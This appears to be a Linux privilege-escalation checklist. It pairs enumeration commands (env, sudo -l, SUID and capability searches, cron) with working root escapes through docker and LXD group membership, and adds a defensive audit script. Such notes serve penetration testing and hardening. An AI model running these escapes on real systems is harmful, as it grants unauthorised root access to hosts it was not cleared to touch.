Obtain information about the system architecture, distribution, and kernel version.
uname -a # System information
lsb_release -a # Distribution information
getconf LONG_BIT # System architecture
cat /proc/version # Kernel version
cat /etc/os-release # OS details
Path
Check if you have write permissions for any directory in the PATH.
Sometimes passwords or other sensitive information can be found in environment variables.
env # Environment variables
set # Shell variables
Groups
List all the groups a user belongs to.
id [user]
groups [user]
Docker
If you belong to the Docker group, you could mount the filesystem within a container and have full access to it, allowing you to modify it.
docker run -it --rm -v /:/mnt alpine chroot /mnt sh
LXD/LXC
Similar to Docker, with LXD/LXC, we can also mount the filesystem within a container, granting full access to it.
# On your machine, download and build an alpine image and transfer it to the host
git clone https://github.com/saghul/lxd-alpine-builder && cd lxd-alpine-builder && sudo ./build-alpine
# Import the image
lxc image import ./alpine.tar.gz --alias privimg
# Initialize
lxd init
# Create the container
lxc init privimg privcont -c security.privileged=true
# Mount the filesystem
lxc config device add privcont privdev disk source=/ path=/mnt/root recursive=true
# Start the container
lxc start privcont
# Interactive shell
lxc exec privcont /bin/sh
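As an added audit helper (not part of the original notes), the checks from the Path and Docker/LXD sections above as a small POSIX shell script: it reports PATH entries the current user can write to and membership in the container groups that are root-equivalent. The function and variable names are my own.

```shell
#!/bin/sh
# Added hardening audit (not from the original notes). Two findings that the
# checklist enumerates by hand: writable PATH directories and membership in
# docker/lxd/lxc, which let a user mount / inside a container.

# writable_path_dirs "<PATH string>": print every directory in the given PATH
# that the current user can write to. A writable bin directory lets a user
# plant a same-named binary that root, sudo rules or cron jobs later execute.
writable_path_dirs() {
    oldifs=$IFS
    IFS=:
    for d in $1; do
        [ -n "$d" ] || d=.    # an empty PATH entry means the current directory
        [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
    done
    IFS=$oldifs
}

# risky_groups "<space-separated group names>": print the groups from the
# list that are root-equivalent because they can bind-mount the host
# filesystem into a privileged container (see the Docker and LXD sections).
risky_groups() {
    for g in $1; do
        case $g in
            docker|lxd|lxc) printf '%s\n' "$g" ;;
        esac
    done
}

# Report on the current session when the script is run directly.
printf 'Writable PATH entries:\n'
writable_path_dirs "$PATH"
printf 'Root-equivalent group memberships:\n'
risky_groups "$(id -nG 2>/dev/null)"
```

Any line printed under either heading is a finding to fix (remove write permission from the directory, or remove the user from the group) rather than something to rely on.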
Sudo
# List user privileges
sudo -l
# Version
sudo -V | grep "Sudo ver"
Capabilities
getcap -r / 2>/dev/null
SUID
find / -type f -perm -4000 -ls 2>/dev/null
Open Ports
ss -nltp
netstat -punta
Cron Jobs
crontab -l
find / -name "cron*" 2>/dev/null
ls -l /var/log/syslog
ls -l /var/log/cron
Process Monitor
You can add words to the blacklist in the grep -Ev section.